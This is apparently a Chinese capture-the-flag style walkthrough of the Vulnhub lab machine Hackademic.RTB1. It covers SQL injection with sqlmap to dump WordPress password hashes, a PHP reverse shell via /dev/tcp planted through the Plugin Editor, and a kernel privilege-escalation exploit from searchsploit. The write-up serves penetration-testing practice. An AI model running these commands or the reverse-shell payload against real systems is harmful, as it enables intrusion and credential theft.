Vulnhub系列靶机 Hackadmeic.RTB1

这篇具有很好参考价值的文章主要介绍了Vulnhub系列靶机 Hackadmeic.RTB1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

端口扫描

nmap -A -p- 192.168.80.143

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

访问80端口

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

使用指纹识别插件查看是WordPress

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

根据首页显示的内容,点击target

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

使用一个用户密码登录 NickJames密码:admin

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

内核提权

查看内核版本

uname -a

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

查看完整路径

searchsploit -p linux/local/15285.c 

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

Vulnhub系列靶机 Hackadmeic.RTB1,# Vulnhub靶机系列,靶场,vulnhub

闯关成功!!!文章来源地址https://www.toymoban.com/news/detail-659233.html

到了这里,关于Vulnhub系列靶机 Hackadmeic.RTB1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(32)
  • Vulnhub靶机:driftingblues 4

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues4(10.0.2.20) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 使用nmap主机发现靶机ip: 10.0.2.20 使用nmap端口扫描发现靶机开放端口: 21、22、80 打开网站没有可利用的功能点,并且

    2024年02月01日
    浏览(39)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(44)
  • Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(28)
  • Vulnhub: bassamCTF: 1靶机

    kali:192.168.111.111 靶机:192.168.111.210 端口扫描 修改hosts文件 爆破出子域名 welcome 对子域目录爆破 index.php 存在文件读取 查看 /etc/passwd 和 config.php 用 config.php 中的账号密码登录ssh,账号: test ,密码: test123 查看test用户的历史命令发现文件 MySecretPassword MySecretPassword 文件内容

    2024年02月11日
    浏览(30)
  • Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(26)
  • Vulnhub: Corrosion靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 目录爆破 blog-post目录下存在两个目录 对archives目录中的randylogs.php进行测试发现存在文件包含 成功包含ssh日志 利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell 文件包含ssh日志文件执行反弹shell 在/var/backups目录下发现us

    2024年02月09日
    浏览(30)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(26)
  • vulnhub靶机02-Breakout

    主机发现 arp-scan -l 扫描端口 nmap --min-rate 10000 -p- 192.168.21.143 扫描端口信息 nmap -sV -sT -O -p80,139,445,10000,20000 192.168.21.143 漏洞扫描 nmap --script=vuln -p80,139,445,10000,20000 192.168.21.143 先看网站 什么都没有看看f12 找到点好东西 解码看看 Brainfuck/OoK加密解密 - Bugku CTF 这个应该没用了,再去

    2024年02月10日
    浏览(32)
  • vulnhub靶机Misdirection

    下载链接:https://download.vulnhub.com/misdirection/Misdirection.zip 解压后双击ovf文件导入虚拟机 网络:DHCP、NAT、192.168.100.0/24网段 192.168.100.133是新增的ip 发现开放了以上端口,继续扫描端口详细信息 扫描的同时去访问一下80和8080端口看看 80是正常的网站 8080是apache默认页 进行目录扫描

    2024年02月02日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包